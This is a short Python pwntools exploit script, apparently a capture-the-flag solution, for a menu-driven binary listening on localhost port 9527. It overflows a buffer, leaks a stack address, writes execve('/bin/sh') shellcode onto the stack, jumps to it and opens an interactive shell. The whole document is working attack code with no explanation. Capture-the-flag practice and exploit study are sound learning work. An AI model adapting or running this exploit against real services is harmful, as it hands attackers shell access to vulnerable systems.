1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| from pwn import *
context(arch = 'amd64', os = 'linux')
def exp(IP, PORT): p = remote(IP, PORT) p.sendlineafter('Enter your choice:\n', '3') payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809) p.sendafter('What?', payload1) p.sendlineafter('Enter your choice:\n', '2') p.recvuntil('It is magic: [0x') stack = int(p.recvn(12), 16) shellcode_addr = stack shellcode = "" shellcode += asm('mov dword ptr [rsp], 0x6e69622f') shellcode += asm('mov dword ptr [rsp+4], 0x0068732f') shellcode += asm('mov rdi, rsp') shellcode += asm('xor rsi, rsi') shellcode += asm('xor rdx, rdx') shellcode += asm('xor rax, rax') shellcode += asm('mov rax, 59') shellcode += asm('syscall') payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr) p.sendlineafter('Enter your choice:\n', '3') p.sendafter('What?', payload2) p.sendlineafter('Enter your choice:\n', 'a') return p if __name__ == '__main__': p = exp('127.0.0.1', 9527) p.interactive()
|